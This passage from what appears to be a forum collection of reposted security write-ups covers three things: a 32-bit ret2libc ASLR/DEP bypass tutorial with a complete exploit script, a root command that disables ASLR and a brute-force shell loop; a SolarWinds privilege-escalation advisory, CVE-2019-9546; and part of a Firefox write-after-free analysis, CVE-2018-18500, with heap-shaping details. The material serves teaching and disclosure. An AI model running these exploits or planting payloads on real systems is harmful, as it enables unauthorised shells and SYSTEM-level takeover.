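# Expected number of brute-force attempts for a fixed base-address guess,
# assuming the base is uniformly distributed over 2**entropy_bits values.
def expected_attempts(entropy_bits):
    n = 2 ** entropy_bits
    return n  # mean of a geometric distribution with success probability 1/n

# e.g. with ~9 bits of effective entropy (a hypothetical figure),
# a shell would pop after roughly 512 tries on average:
print(expected_attempts(9))  # → 512
```

The actual entropy depends on the kernel and mmap configuration, but for 32-bit processes it is small enough that a simple retry loop, as shown above, succeeds in a practical amount of time.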

    Please note that for this exercise, stack cookies are disabled while compiling the code (`-fno-stack-protector`):

    $ r2 yolo
     -- Finnished a beer
    [0x00001050]> i
    file     yolo
    size     0x3c80
    format   elf
    arch     x86
    bits     32
    canary   false <-- no cookies for you
    nx       true
    os       linux
    pic      true
    relocs   true
    relro    partial
    

    Getting EIP Control

    The first step in exploiting this application is to gain control over the EIP register. To determine the offset at which the EIP overwrite happens, a buffer with a pattern is sent to the application using a Python script. The first version of this script just sends a large buffer to check whether the application really crashes:

    #!/usr/bin/python2.7
    
    print "A" * 2000
    

    Now let’s debug the application with r2:

    $ r2 -d yolo
    [0xf7f3e0b0]> ood `!python2.7 b.py`
    [...]
    [0xf7ef40b0]> dc
    child stopped with signal 11
    [+] SIGNAL 11 errno=0 addr=0x41414141 code=1 ret=0
    [0x41414141]> dr
    eax = 0xff8a0317
    ebx = 0x41414141
    ecx = 0xff8a3000
    edx = 0xff8a0add
    esi = 0xf7ea7e24
    edi = 0xf7ea7e24
    esp = 0xff8a0860
    ebp = 0x41414141
    eip = 0x41414141
    eflags = 0x00010282
    oeax = 0xffffffff
    

    The input caused the application to successfully overwrite its EIP register with “AAAA” (41414141). Now repeat this step with a cyclic pattern to determine the correct offset for EIP control. For this, use ragg2 -P 2000 to create the pattern and modify the Python script to print the pattern:

    $ r2 -d yolo
    [0xf7f960b0]> ood `!python2.7 b.py`
    [...]
    [0xf7ef00b0]> dc
    child stopped with signal 11
    [+] SIGNAL 11 errno=0 addr=0x48415848 code=1 ret=0
    [0x48415848]> wopO `dr eip`
    1349
    

    Therefore the EIP register gets overwritten after 1349 bytes.
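Conceptually, what `ragg2 -P` and `wopO` do can be sketched in a few lines of Python (our approximation of the idea, not radare2's actual implementation): generate a cyclic pattern whose 4-byte windows are unique, then search the pattern for the dword that landed in EIP:

```python
import string
import struct

def cyclic_pattern(length):
    """Metasploit-style cyclic pattern: Aa0Aa1Aa2... (unique 4-byte windows)."""
    out = []
    for upper in string.ascii_uppercase:
        for lower in string.ascii_lowercase:
            for digit in string.digits:
                out.append(upper + lower + digit)
                if len(out) * 3 >= length:
                    return "".join(out)[:length]
    return "".join(out)[:length]

def find_offset(pattern, eip_value):
    """Recover the offset from the dword that landed in EIP (little-endian)."""
    needle = struct.pack("<I", eip_value).decode()
    return pattern.find(needle)

pat = cyclic_pattern(2000)
# Simulate a crash where EIP was overwritten by the pattern bytes at offset 1349:
fake_eip = struct.unpack("<I", pat[1349:1353].encode())[0]
print(find_offset(pat, fake_eip))  # → 1349
```

Because every 4-byte sequence appears only once in the pattern, the crash value in EIP maps back to exactly one offset in the input buffer.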

    ret2libc

    To successfully leverage a return2libc exploit, the following things are required:

    • Start address of libc: This will be brute-forced
    • The offset of the string /bin/sh in the specific libc version in use
    • The offset of the system() call
    • (The offset of exit() to prevent the application from crashing after the shell has exited)

    The idea is to make the application reuse code already present in its memory space to spawn a shell. Because no injected code from the user input is ever executed, DEP won't kick in. If everything works as expected, the application will call system("/bin/sh") upon successful exploitation. The layout of the input buffer is as follows:

    <Junk Byte> * 1349 (Offset)
    <Address of system()> (new EIP)
    <Address of exit()> (new return address)
    <Address of /bin/sh string> (Argument for system())
    

    The layout of this buffer ultimately causes a fake stack frame to be created in the memory of the application. After returning from the call to lol, the program will execute system() with /bin/sh as parameter and exit() as return address. Remember, on x86 arguments are pushed onto the stack in reverse order before calling a function.

    Determining Offsets

    The addresses and offsets mentioned above can be determined using r2 from a running debug session:

    r2 -d yolo
    [0xf7f040b0]> dcu main
    Continue until 0x5660a1be using 1 bpsize
    hit breakpoint at: 5660a1be
    
    [0x5660a1be]> dmi
    0xf7cdf000 0xf7cf8000  /usr/lib32/libc-2.28.so <-- start address of libc of this run
    
    [0x5660a1be]> dmi libc system
    1524 0x0003e8f0 0xf7d1d8f0   WEAK   FUNC   55 system <-- offset of system()
    
    [0x5660a1be]> dmi libc exit
    150 0x000318e0 0xf7d108e0 GLOBAL   FUNC   33 exit <-- offset of exit()
    
    [0x5660a1be]> e search.in=dbg.maps <-- search in more segments
    [0x5660a1be]> / /bin/sh <-- search for /bin/sh string
    Searching 7 bytes in [0xffdb7000-0xffdd8000]
    hits: 0
    0xf7e5eaaa hit0_0 .b/strtod_l.c-c/bin/shexit 0canonica. <-- /bin/sh found
    

    Therefore the values for the exploit to use are:

    • libc start address: 0xf7cdf000 (we just hope this value occurs again)
    • system() offset: 0x0003e8f0
    • exit() offset: 0x000318e0
    • /bin/sh offset: 0x17FAAA (0xf7e5eaaa - 0xf7cdf000)

    In case the correct libc start address is guessed, all other values should then automatically fit too.

    For debugging purposes: Always print the calculated addresses since bad characters like 0x00 or 0x0A in address values may corrupt the input buffer and prevent exploitation.
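A tiny helper along those lines (our addition, not part of the original post) can flag addresses whose little-endian encoding contains typical bad bytes before they ever reach the target:

```python
import struct

BAD_BYTES = {0x00, 0x0a, 0x0d, 0x20}  # NUL, \n, \r, space -- adjust per target

def bad_bytes_in(addr):
    """Return the bad bytes contained in the packed 32-bit address."""
    return [f"0x{b:02x}" for b in struct.pack("<I", addr) if b in BAD_BYTES]

libc_start = 0xf7cdf000  # the base address observed in one run above
for name, addr in [("system ", libc_start + 0x0003e8f0),
                   ("exit   ", libc_start + 0x000318e0),
                   ("/bin/sh", libc_start + 0x0017faaa)]:
    bad = bad_bytes_in(addr)
    print(f"{name} = 0x{addr:08x} -> {'OK' if not bad else 'BAD: ' + ', '.join(bad)}")
```

If any of the three addresses reports bad bytes, a different libc base guess (or a different gadget/string offset) is needed, since strcpy stops at the first NUL byte.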

    Putting the Exploit together

    The developed exploit looks as follows:

    #!/usr/bin/python2.7
    
    import struct
    import sys
    
    EIP_OFFSET = 1349
    
    libc_start = 0xf7cdf000
    binsh_offset = 0x0017FAAA
    system_offset = 0x0003e8f0
    exit_offset = 0x000318e0
    
    system_addr = libc_start + system_offset
    exit_addr = libc_start + exit_offset
    binsh_addr = libc_start + binsh_offset
    
    PAYLOAD = ""
    
    while len(PAYLOAD) < EIP_OFFSET:
        PAYLOAD += "\x90" # NOP
    
    PAYLOAD += struct.pack("<I",system_addr)
    PAYLOAD += struct.pack("<I",exit_addr)
    PAYLOAD += struct.pack("<I",binsh_addr)
    
    sys.stdout.write(PAYLOAD)
    

    To test it without ASLR in place and therefore without the need to brute force the libc start address, temporarily disable ASLR on the system using a root shell:

    # echo 0 > /proc/sys/kernel/randomize_va_space
    

    This causes the start address to remain static and the first exploitation attempt should always succeed:

    [0x565561be]> dmi
    0xf7db0000 0xf7dc9000  /usr/lib32/libc-2.28.so <-- libc start address after disabling ASLR
    [0xf7fd50b0]> ood `!python2.7 exploit.py` <-- running the exploit with static address above
    [0xf7fd50b0]> dc
    sh-5.0$ <-- :)
    

    Now that this worked, enable ASLR again:

    # echo 2 > /proc/sys/kernel/randomize_va_space
    

    And run the exploit in an infinite loop until a shell gets spawned:

    $ while true; do echo -ne "."; ./yolo $(python2.7 exploit.py); done
    ..........................................................................................................yolo: vfprintf.c:4157552864: l: Assertion `(size_t) done <= (size_t) INT_MAX' failed.
    .........................................
    sh-5.0$
    

    ASLR and DEP have been successfully bypassed. The V! view of r2 shows the addresses after being pushed on the stack:

    V!

    Ok Bye.

     

    Sursa: https://ps1337.github.io/post/binary-aslr-dep-32/

  7.  
    While conducting research on insecure Windows Communication Foundation (WCF) endpoints, we stumbled upon SolarWinds' fleet of products for two reasons: first, they offer a handful of software products that you can test, and second, most of the services are built on the .NET Framework, which makes them strong candidates for our research.
     
    During the testing process, we usually look for the low-hanging-fruit variety of bugs. This includes, among other things, dynamic analysis of the target's program folder (if any) under the "C:\ProgramData" directory, and that is how we found a rather trivial elevation-of-privilege vulnerability in the SolarWinds Orion Platform that affected a total of 14 products.
     
    The following is the process used to find and exploit the security vulnerability using SolarWinds Network Configuration Manager v7.8 on Windows Server 2012 R2 Standard instance. First off, we set the following self-explanatory filters in Procmon64.exe
     
    Running it will reveal that the cmd.exe process is trying to run the handle.exe binary as "NT AUTHORITY\SYSTEM" under the "C:\ProgramData\SolarWinds\Orion\RabbitMQ\" directory every 5 seconds!
     
    We can see the full command that was used in the command line section under event properties. Now if you haven't used or heard of handle.exe before, it's a Windows Sysinternals utility that displays information about open handles for any given process on the system:
     
    Examining the properties of Parent PID 4272 under procexp64.exe clearly shows the logic behind this abnormal behavior:
     
    Both the erl.exe process command line arguments and current directory path are enforcing “C:\ProgramData\SolarWinds\Orion\RabbitMQ\” as the current working directory. Before diving in too far, let’s talk more about RabbitMQ which is according to its official website here:
     
    With more than 35,000 production deployments of RabbitMQ world-wide at small startups and large enterprises, RabbitMQ is the most popular open source message broker.
     
    RabbitMQ is lightweight and easy to deploy on premises and in the cloud. It supports multiple messaging protocols. RabbitMQ can be deployed in distributed and federated configurations to meet high-scale, high-availability requirements.
     
    RabbitMQ runs on many operating systems and cloud environments, and provides a wide range of developer tools for most popular languages.
     
    Reading through a few RabbitMQ installation guides for Windows, we noticed that Erlang is required for RabbitMQ to function. In addition, handle.exe is used by RabbitMQ to monitor the local file system and update the "File descriptors" field in the RabbitMQ web dashboard. All we need at this point is to confirm, via AccessEnum.exe, that a low-privileged user can create/write files there; this is the default DACL for the Users group on "C:\ProgramData" and its sub-folders due to inheritance:
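The same check can also be scripted. Here is a minimal sketch (our addition; the path is the one abused in the write-up) that simply tries to drop and delete a probe file as the current user:

```python
import os

# Directory targeted in the write-up; adjust for e.g. the 8MAN variant,
# which uses C:\ProgramData\rabbitmq\ instead.
TARGET = r"C:\ProgramData\SolarWinds\Orion\RabbitMQ"

def can_write(directory):
    """Return True if the current user can create a file in `directory`."""
    probe = os.path.join(directory, "write_probe.tmp")
    try:
        with open(probe, "w") as f:
            f.write("probe")
        os.remove(probe)
        return True
    except OSError:
        return False

print(f"{TARGET} writable: {can_write(TARGET)}")
```

If the probe succeeds as a standard user, any binary dropped there named handle.exe will be executed with SYSTEM privileges on the next 5-second cycle.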
     
    We used msfvenom from Metasploit toolset to create calc.exe payload:
     
    We logged in as a standard user and then copied our handle.exe payload to the problematic folder while running procexp64.exe in the background, which effectively pops a calc every 5 seconds as "NT AUTHORITY\SYSTEM"
     
    We’ve also recorded a demonstration video for SolarWinds Patch Manager v2.1 on Windows Server 2016 Standard install for your convenience:
     
     
    It's worth mentioning that unlike the other affected products, Access Rights Manager 8MAN v9.1.181.0 uses the vulnerable path “C:\ProgramData\rabbitmq\” instead. Also, we were quite impressed by the exceptional response time and professionalism delivered by SolarWinds PSIRT team. A link to the knowledgebase article regarding this vulnerability can be found here.
     
    While wrapping up this blog post, we had an interesting thought: how many applications out there utilize RabbitMQ? And what are the chances of those applications having the same issue? We will leave this as an exercise for the reader. Lastly, feel free to reach out to us at labs@activecyber.us if you have any questions. See the link here for a complete list of ACTIVELabs advisories.
     
    Affected Products
    • SolarWinds IP Address Manager v4.7.0
    • SolarWinds Log Manager for Orion v1.1.0
    • SolarWinds Network Configuration Manager v7.8
    • SolarWinds Orion Network Performance Monitor v12.3
    • SolarWinds Orion Network Traffic Analyzer v4.4
    • SolarWinds Server & Application Monitor v6.7
    • SolarWinds Server Configuration Monitor v1.0
    • SolarWinds Storage Resource Monitor v6.7
    • SolarWinds User Device Tracker v3.3.1
    • SolarWinds Virtualization Manager v8.3
    • SolarWinds VoIP and Network Quality Manager v4.5
    • SolarWinds Web Performance Monitor v2.2.2
    • SolarWinds Patch Manager v2.1
    • Access Rights Manager 8MAN v9.1.181.0
     
     
    Disclosure Timeline
    • 02-19-19: ACTIVELabs sent security vulnerability report to SolarWinds PSIRT team
    • 02-20-19: PSIRT team acknowledged report and stated that they will investigate the issue
    • 02-27-19: PSIRT team communicated that the security vulnerability has been addressed
    • 02-27-19: ACTIVELabs requested more information
    • 02-28-19: PSIRT team confirmed that a patch has been included/released in HotFix 2 version
    • 03-01-19: ACTIVELabs requested CVE from MITRE
    • 03-01-19: CVE-2019-9546 assigned
    • 03-01-19: ACTIVELabs notified PSIRT team about CVE assignment and a blog post will be published in the near future
    • 03-04-19: PSIRT team requested to delay blog post release until proper knowledge base article can be prepared/published
    • 03-04-19: Notified PSIRT team that we will hold off on the blog post until further notice
    • 03-06-19: PSIRT team informed us that a knowledge base article has been released
    • 05-03-19: Blog post released

     

    Sursa: https://www.activecyber.us/activelabs/solarwinds-local-privilege-escalation-cve-2019-9546

  8. CVE-2018-18500: write-after-free vulnerability in Firefox, Analysis and Exploitation


    Editor’s note: This article is a technical description of a bug discovered by a member of the Offensive Research team at SophosLabs, and how the researcher created a proof-of-concept “Arbitrary Read/Write Primitive” exploit for this bug. The vulnerability was deemed critical by Mozilla’s bug tracking team and was patched in Firefox 65.0. It’s written for an audience with background in security vulnerability research; no background in Firefox internals or web browsers in general is necessary.

    Overview

    This article is about CVE-2018-18500, a security vulnerability in Mozilla Firefox found and reported to the Mozilla Foundation by SophosLabs in November, 2018.

    This security vulnerability involves a software bug in Gecko (Firefox’s browser engine), in code responsible for parsing web pages. A malicious web page can be programmed in a way that exploits this bug to fully compromise a vulnerable Firefox instance visiting it.

    The engine component where the bug exists is the HTML5 Parser, specifically around the handling of “Custom Elements.”

    The root cause of the bug described here is a programming error in which a C++ object is being used without properly holding a reference to it, allowing for the object to be prematurely freed. These circumstances lead to a memory corruption condition known as “Write After Free,” where the program erroneously writes into memory that has been freed.

    Due to the numerous security mitigations applied to today’s operating systems and programs, developing a functional exploit for a memory corruption vulnerability in a web browser is no easy feat. It more often than not requires the utilization of multiple bugs and implementation of complex logic taking advantage of intricate program-specific techniques. This means that extensive use of JavaScript is virtually a requirement for this type of work, and such is the case in here as well.

    The article uses 64-bit Firefox 63.0.3 for Windows for binary-specific details, and will reference the Gecko source code and the HTML Standard.

    Background – Custom Elements

    “Custom Elements” is a relatively new addition to the HTML standard, as part of the “Web Components” API. Simply put, it provides a way to create new types of HTML elements. Its full specification can be found here.

    This is an example for a basic Custom Element definition of an element extension named extended-br that will behave the same as a regular br element except also print a line to log upon construction:
    html_1.png?w=640
    The above example uses the “customized built-in element” variant, which is instantiated by using the "is" attribute (line 17).
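The definition itself is only shown as an image; the following is a hedged reconstruction of such a “customized built-in element” definition (the class name ExtendedBr is illustrative, not taken from the original figure):

```html
<!-- Hedged sketch: a customized built-in element extending <br> that
     logs a line when constructed. -->
<script>
  class ExtendedBr extends HTMLBRElement {
    constructor() {
      super();
      console.log("extended-br constructed");
    }
  }
  customElements.define("extended-br", ExtendedBr, { extends: "br" });
</script>

<br is="extended-br">
```

The `is` attribute on the final line is what instantiates the customized built-in variant, as the text above notes.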

    Support for Custom Elements was introduced in the Firefox 63 release (October 23, 2018).

    The Bug

    The bug occurs when Firefox creates a custom element in the process of HTML tree construction. In this process the engine code may dispatch a JavaScript callback to invoke the matching custom element definition’s constructor function.

    The engine code surrounding the JavaScript dispatch point makes use of a C++ object without properly holding a reference to it.

    When the engine code resumes execution after returning from the JavaScript callback function, it performs a memory write into a member variable of this C++ object.
    However the called constructor function can be defined to cause the abortion of the document load, which means the abortion of the document’s active parser, internally causing the destruction and de-allocation of the active parser’s resources, including the aforementioned C++ object.

    When this happens, a “Write-After-Free” memory corruption will occur.

    Here’s the relevant part in the HTML5 Parser code for creating an HTML element:

     1  nsresult
     2  nsHtml5TreeOperation::Perform(nsHtml5TreeOpExecutor* aBuilder,
     3                                nsIContent** aScriptElement,
     4                                bool* aInterrupted,
     5                                bool* aStreamEnded)
     6  {
     7    switch (mOpCode) {
     8      ...
     9      case eTreeOpCreateHTMLElementNetwork:
    10      case eTreeOpCreateHTMLElementNotNetwork: {
    11        nsIContent** target = mOne.node;
    12        ...
    13        *target = CreateHTMLElement(name,
    14                                    attributes,
    15                                    mOpCode == eTreeOpCreateHTMLElementNetwork
    16                                      ? dom::FROM_PARSER_NETWORK
    17                                      : dom::FROM_PARSER_DOCUMENT_WRITE,
    18                                    nodeInfoManager,
    19                                    aBuilder,
    20                                    creator);
    21        return NS_OK;
    22      }
    23      ...
    24  }
    25
    26  nsIContent*
    27  nsHtml5TreeOperation::CreateHTMLElement(
    28    nsAtom* aName,
    29    nsHtml5HtmlAttributes* aAttributes,
    30    mozilla::dom::FromParser aFromParser,
    31    nsNodeInfoManager* aNodeInfoManager,
    32    nsHtml5DocumentBuilder* aBuilder,
    33    mozilla::dom::HTMLContentCreatorFunction aCreator)
    34  {
    35    ...
    36    if (nsContentUtils::IsCustomElementsEnabled()) {
    37      ...
    38      if (isCustomElement && aFromParser != dom::FROM_PARSER_FRAGMENT) {
    39        ...
    40        definition = nsContentUtils::LookupCustomElementDefinition(
    41          document, nodeInfo->NameAtom(), nodeInfo->NamespaceID(), typeAtom);
    42
    43        if (definition) {
    44          willExecuteScript = true;
    45        }
    46      }
    47    }
    48
    49    if (willExecuteScript) { // This will cause custom element
    50                             // constructors to run
    51      ...
    52      nsCOMPtr<dom::Element> newElement;
    53      NS_NewHTMLElement(getter_AddRefs(newElement),
    54                        nodeInfo.forget(),
    55                        aFromParser,
    56                        isAtom,
    57                        definition);
    58      ...

    Inside NS_NewHTMLElement, if the element being created is a custom element, the function CustomElementRegistry::Upgrade will be called to invoke the custom element’s constructor, passing control to JavaScript.

    After the custom element constructor finishes running and CreateHTMLElement() returns execution to Perform(), line 13 completes its execution: the return value of CreateHTMLElement() is written into the memory address pointed to by target.

    Next, I’ll explain where target points, and where it is set, how to free that memory using JavaScript code, and what type of value is being written to freed memory.

    What’s “target?”

    We can see target being assigned in line 11: nsIContent** target = mOne.node;.
    This is where mOne.node comes from:

    nsIContentHandle*
    nsHtml5TreeBuilder::createElement(int32_t aNamespace,
                                      nsAtom* aName,
                                      nsHtml5HtmlAttributes* aAttributes,
                                      nsIContentHandle* aIntendedParent,
                                      nsHtml5ContentCreatorFunction aCreator)
    {
      ...
        nsIContent* elem;
        if (aNamespace == kNameSpaceID_XHTML) {
          elem = nsHtml5TreeOperation::CreateHTMLElement(
            name,
            aAttributes,
            mozilla::dom::FROM_PARSER_FRAGMENT,
            nodeInfoManager,
            mBuilder,
            aCreator.html);
        }
      ...
      nsIContentHandle* content = AllocateContentHandle();
      ...
      treeOp->Init(aNamespace,
                   aName,
                   aAttributes,
                   content,
                   aIntendedParent,
                   !!mSpeculativeLoadStage,
                   aCreator);
    inline void Init(int32_t aNamespace,
                     nsAtom* aName,
                     nsHtml5HtmlAttributes* aAttributes,
                     nsIContentHandle* aTarget,
                     nsIContentHandle* aIntendedParent,
                     bool aFromNetwork,
                     nsHtml5ContentCreatorFunction aCreator)
    {
      ...
      mOne.node = static_cast<nsIContent**>(aTarget);
      ...
    }

    So the value of target comes from AllocateContentHandle():

    nsIContentHandle*
    nsHtml5TreeBuilder::AllocateContentHandle()
    {
      ...
      return &mHandles[mHandlesUsed++];
    }

    This is how mHandles is initialized in nsHtml5TreeBuilder‘s constructor initializer list:

    nsHtml5TreeBuilder::nsHtml5TreeBuilder(nsAHtml5TreeOpSink* aOpSink,
                                           nsHtml5TreeOpStage* aStage)
      ...
      , mHandles(new nsIContent*[NS_HTML5_TREE_BUILDER_HANDLE_ARRAY_LENGTH])
      ...

    So an array with the capacity to hold NS_HTML5_TREE_BUILDER_HANDLE_ARRAY_LENGTH (512) pointers to nsIContent objects is first initialized when the HTML5 parser’s tree builder object is created, and every time AllocateContentHandle() is called it returns the next unused slot in the array, starting from index number 0.

    On 64-bit systems, the allocation size of mHandles is NS_HTML5_TREE_BUILDER_HANDLE_ARRAY_LENGTH * sizeof(nsIContent*) == 512 * 8 == 4096 (0x1000).

    How to get mHandles freed?

    mHandles is a member variable of class nsHtml5TreeBuilder. In the context of the buggy code flaw, nsHtml5TreeBuilder is instantiated by nsHtml5StreamParser, which in turn is instantiated by nsHtml5Parser.

    We used the following JavaScript code in the custom element constructor:

    location.replace("about:blank");

    We tell the browser to navigate away from the current page and cause the following call tree in the engine:

    Location::SetURI()
    -> nsDocShell::LoadURI()
       -> nsDocShell::InternalLoad()
          -> nsDocShell::Stop()
             -> nsDocumentViewer::Stop()
                -> nsHTMLDocument::StopDocumentLoad()
                   -> nsHtml5Parser::Terminate()
                      -> nsHtml5StreamParser::Release()

    That last function call drops a reference to the active nsHtml5StreamParser object, but it is not yet orphaned: the remaining references are to be dropped by a couple of asynchronous tasks that will only get scheduled the next time Gecko’s event loop spins.

    This is normally not going to happen in the course of running a JavaScript function, since one of JavaScript’s properties is that it’s “Never blocking”, but in order to trigger the bug we must have these pending asynchronous tasks executed before the custom element constructor returns.

     

    The last link gives a hint on how to accomplish this: “Legacy exceptions exist like alert or synchronous XHR“. XHR (XMLHttpRequest) is an API that can be used to retrieve data from a web server.

    It’s possible to make use of synchronous XHR to cause the browser engine to spin the event loop until the XHR call completes; that is, when data has been received from the web server.
    So by using the following code in the custom element constructor…

    1  location.replace("about:blank");
    2
    3  var xhr = new XMLHttpRequest();
    4  xhr.open('GET', '/delay.txt', false);
    5  xhr.send(null);

    …and setting the contacted web server to artificially delay the response for /delay.txt requests by a few seconds to cause a long period of event loop spinning in the browser, we can guarantee that, by the time line 5 completes execution, the currently active nsHtml5StreamParser object will have become orphaned. Then the next time a garbage collection cycle occurs, the orphaned nsHtml5StreamParser object will be destructed and have its resources de-allocated (including mHandles).

    "about:blank" is used for the new location because it is an empty page that does not require network interaction for loading.

    The aim is to make sure that the amount of work (code logic) performed by the engine in the span between the destruction of the nsHtml5StreamParser object and the write-after-free corruption is as minimal as possible, because the steps we will be taking for exploiting the bug rely on successfully shaping certain structures in heap memory. Since heap allocators are non-deterministic in nature, any extra logic running in the engine at the same time increases the chance of side effects in the form of unexpected allocations that can sabotage the exploitation process.

    What value is being written to freed memory?

    The return value of nsHtml5TreeOperation::CreateHTMLElement is a pointer to a newly created C++ object representing an HTML element, e.g. HTMLTableElement or HTMLFormElement.

    Since triggering the bug requires the abortion of the currently running document parser, this new object does not get linked to any existing data structures and remains orphaned, and eventually gets released in a future garbage collection cycle.

    Controlling write-after-free offset

    To summarize so far, the bug can be exploited to effectively have the following pseudo-code take place:

    nsIContent* mHandles[] = moz_xmalloc(0x1000);
    nsIContent** target = &mHandles[mHandlesUsed++];
    free(mHandles);
    ...
    *target = CreateHTMLElement(...);

    So while the value being written into freed memory here (return value of CreateHTMLElement()) is uncontrollable (always a memory allocation pointer) and its contents unreliable (orphaned object), we can adjust the offset in which the value is written relative to the base address of freed allocation, according to the value of mHandlesUsed. As we previously showed mHandlesUsed increases for every HTML element the parser encounters:

    <br>                          <-- mHandlesUsed = 0
    <br>                          <-- mHandlesUsed = 1
    <br>                          <-- mHandlesUsed = 2
    <br>                          <-- mHandlesUsed = 3
    <br>                          <-- mHandlesUsed = 4
    <br>                          <-- mHandlesUsed = 5
    <br>                          <-- mHandlesUsed = 6
    <span is=custom-span></span>  <-- mHandlesUsed = 7

    In the above example, given the allocation address of mHandles was 0x7f0ed4f0e000 and the custom span element triggered the bug in its constructor, the address of the newly created HTMLSpanElement object will be written into 0x7f0ed4f0e038 (0x7f0ed4f0e000 + (7 * sizeof(nsIContent*))).
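The slot arithmetic above can be checked directly. This is just the offset calculation, using the example address from the text (BigInt, since 64-bit pointers exceed JavaScript's safe integer range):

```javascript
// Each mHandles slot holds one pointer, so slot n lives at base + n * 8.
function handleSlotAddress(base, mHandlesUsed) {
  return base + BigInt(mHandlesUsed) * 8n;
}

const base = 0x7f0ed4f0e000n;          // example mHandles address from the text
console.log(handleSlotAddress(base, 7).toString(16)); // "7f0ed4f0e038"
```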

    Surviving document destruction

    Since triggering the bug requires navigating away and aborting the load of the current document, we will not be able to execute JavaScript in that document anymore after the constructor function returns:
    JavaScript error: , line 0: NotSupportedError: Refusing to execute function from window whose document is no longer active.
    For crafting a functional exploit, it’s necessary to keep executing more JavaScript logic after the bug is triggered. For that purpose we can use a main web page that creates a child iframe element inside of which the HTML and JavaScript code for triggering the bug will reside.

    After the bug is triggered and the child iframe’s document has been changed to "about:blank" the main page remains intact and can execute the remaining JavaScript logic in its context.

    Here’s an example of an HTML page creating a child iframe:

    html_2.png?w=640
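The page itself is only shown as a screenshot; the following is a hedged sketch of the same structure (the child document name child.html is illustrative, not from the original figure):

```html
<!-- Main page: survives while the child iframe's document load is aborted. -->
<body>
  <script>
    var iframe = document.createElement("iframe");
    iframe.src = "child.html"; // hypothetical page that triggers the bug
    document.body.appendChild(iframe);
  </script>
</body>
```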

    Background – concepts and properties of Firefox’s heap

    To understand the exploitation process here it’s crucial to know how Firefox’s memory allocator works. Firefox uses a memory allocator called mozjemalloc, which is a fork of the jemalloc project. This section will briefly explain a few basic terms and properties of mozjemalloc, using as reference these 2 articles you should definitely read for properly understanding the subject: [PSJ] & [TSOF].

    Regions:
    Regions are the heap items returned on user allocations (e.g. malloc(3) calls).” [PSJ]

    Chunks:
    The term ‘chunk’ is used to describe big virtual memory regions that the memory allocator conceptually divides available memory into.” [PSJ]

    Runs:
    Runs are further memory denominations of the memory divided by jemalloc into chunks.” [PSJ]
    In essence, a chunk is broken into several runs.” [PSJ]
    Each run holds regions of a specific size.” [PSJ]

    Size classes:
    Allocations are broken into categories according to size class.
    Size classes in Firefox’s heap: 4, 8, 16, 32, 48, …, 480, 496, 512, 1024, 2048. [mozjemalloc.cpp]
    Allocation requests are rounded up to the nearest size class.

     

    Bins:
    Each bin has an associated size class and stores/manages regions of this size class.” [PSJ]
    A bin’s regions are managed and accessed through the bin’s runs.” [PSJ]
    Pseudo-code illustration:

    void *x = malloc(513);
    void *y = malloc(650);
    void *z = malloc(1000);
    // now: x, y, z were all allocated from the same bin,
    // of size class 1024, the smallest size class that is
    // larger than the requested size in all 3 calls
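The rounding into size classes can be modeled with a small helper; this is a sketch based on the class list quoted above (4, 8, 16, then multiples of 16 up to 512, then 1024 and 2048), not mozjemalloc's actual implementation:

```javascript
// Round an allocation request up to the nearest size class.
function sizeClass(n) {
  if (n <= 4) return 4;
  if (n <= 8) return 8;
  if (n <= 512) return Math.ceil(n / 16) * 16; // 16, 32, 48, ..., 496, 512
  if (n <= 1024) return 1024;
  return 2048;
}

console.log(sizeClass(513), sizeClass(650), sizeClass(1000)); // 1024 1024 1024
console.log(sizeClass(0x298)); // 1024 (0x400), the XMLHttpRequestMainThread case
```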
     

    LIFO free list:
    Another interesting feature of jemalloc is that it operates in a last-in-first-out (LIFO) manner (see [PSJ] for the free algorithm); a free followed by a garbage collection and a subsequent allocation request for the same size, most likely ends up in the freed region.” [TSOF]
    Pseudo-code illustration:

    void *x = moz_xmalloc(0x1000);
    free(x);
    void *y = moz_xmalloc(0x1000);
    // now: x == y
     

    Same size class allocations are contiguous:
    At a certain state that may be achieved by performing many allocations and exhausting the free list, sequential allocations of the same size class will be contiguous in memory – “Allocation requests (i.e. malloc() calls) are rounded up and assigned to a bin. […] If none is found, a new run is allocated and assigned to the specific bin. Therefore, this means that objects of different types but with similar sizes that are rounded up to the same bin are contiguous in the jemalloc heap.” [TSOF]

    Pseudo-code illustration:

    for (i = 0; i < 1000; i++) {
            x = moz_xmalloc(0x400);
    }
    // x[995] == 0x7fb8fd3a1c00
    // x[996] == 0x7fb8fd3a2000 (== x[995] + 0x400)
    // x[997] == 0x7fb8fd3a2400 (== x[996] + 0x400)
    // x[998] == 0x7fb8fd3a2800 (== x[997] + 0x400)
    // x[999] == 0x7fb8fd3a2c00 (== x[998] + 0x400)
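Both properties can be illustrated with a toy allocator; this is a deliberately simplified model (a bump pointer plus per-size LIFO free lists), not mozjemalloc itself:

```javascript
// Toy heap: new allocations come from a bump pointer; freed regions go on a
// per-size LIFO free list and are handed back first on the next request.
function makeHeap() {
  let next = 0x10000;
  const freeLists = new Map();
  return {
    malloc(size) {
      const fl = freeLists.get(size);
      if (fl && fl.length) return fl.pop();  // LIFO reuse of freed regions
      const addr = next;
      next += size;                          // fresh, contiguous region
      return addr;
    },
    free(addr, size) {
      if (!freeLists.has(size)) freeLists.set(size, []);
      freeLists.get(size).push(addr);
    },
  };
}

const heap = makeHeap();
const x = heap.malloc(0x1000);
heap.free(x, 0x1000);
const y = heap.malloc(0x1000); // y === x: the freed region is reused (LIFO)
const a = heap.malloc(0x400);
const b = heap.malloc(0x400);  // b === a + 0x400: same-class allocations adjacent
```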
     

    Run recycling:
    When all allocations inside a run are freed, the run gets de-allocated and is inserted into a list of available runs. A de-allocated run may get coalesced with adjacent de-allocated runs to create a bigger, single de-allocated run. When a new run is needed (for holding new memory allocations) it may be taken from the list of available runs. This allows a memory address that belonged to one run holding allocations of a specific size class to be “recycled” into being part of a different run, holding allocations of a different size class.
    Pseudo-code illustration:

    for (i = 0; i < 1000; i++) {
            x = moz_xmalloc(1024);
    }
    for (i = 0; i < 1000; i++) {
            free(x);
    }
    // after freeing all 1024 sized allocations, runs of 1024 size class
    // have been de-allocated and put into the list of available runs
    for (i = 0; i < 1000; i++) {
            y = moz_xmalloc(512);
            // runs necessary for holding new 512 allocations, if necessary,
            // will get taken from the list of available runs and get assigned
            // to 512 size class bins
    }
    // some elements in y now have the same addresses as elements in x
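The run-recycling behavior can likewise be sketched with a toy model (runs are 0x1000-byte pages, one size class per run; none of this is mozjemalloc's real logic):

```javascript
// Toy model of run recycling: a run whose allocations are all freed goes back
// on a shared list of available runs, which any size class may then reuse.
class ToyHeap {
  constructor() {
    this.nextPage = 0x10;     // index of the next fresh 0x1000-byte page
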